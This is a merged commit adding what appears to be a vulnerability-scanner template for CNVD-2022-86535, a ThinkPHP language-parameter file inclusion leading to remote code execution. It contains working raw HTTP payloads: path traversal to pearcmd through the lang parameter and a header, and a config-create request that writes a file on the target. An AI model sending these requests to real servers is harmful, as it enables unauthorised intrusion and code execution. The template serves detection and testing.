Merge pull request #6405 from Armandhe-China/cnvd-2022-86535

CNVD-2022-86535
2023-07-05 11:47:41 +05:30 · 2023-07-05 11:47:41 +05:30 · e4a1155112
parent e47b533364 4e590e5d3c
commit e4a1155112
1 changed files with 44 additions and 0 deletions
--- a/http/cnvd/2022/CNVD-2022-86535.yaml
+++ b/http/cnvd/2022/CNVD-2022-86535.yaml
@ -0,0 +1,44 @@
+id: CNVD-2022-86535
+
+info:
+  name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
+  author: arliya,ritikchaddha
+  severity: high
+  description: |
+    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
+  reference:
+    - https://cn-sec.com/archives/1465289.html
+    - https://blog.csdn.net/qq_60614981/article/details/128724640
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
+  metadata:
+    verified: true
+  tags: cnvd,cnvd2022,thinkphp,rce
+
+http:
+  - raw:
+      - |
+        GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        think-lang: ../../../../../usr/local/php/pearcmd
+
+      - |
+        GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: set_cookie
+        words:
+          - "think_lang=..%2F..%2F..%2F..%2F"
+
+      - type: word
+        part: body_3
+        words:
+          - "CONFIGURATION"
+          - "Successfully created"
+        condition: and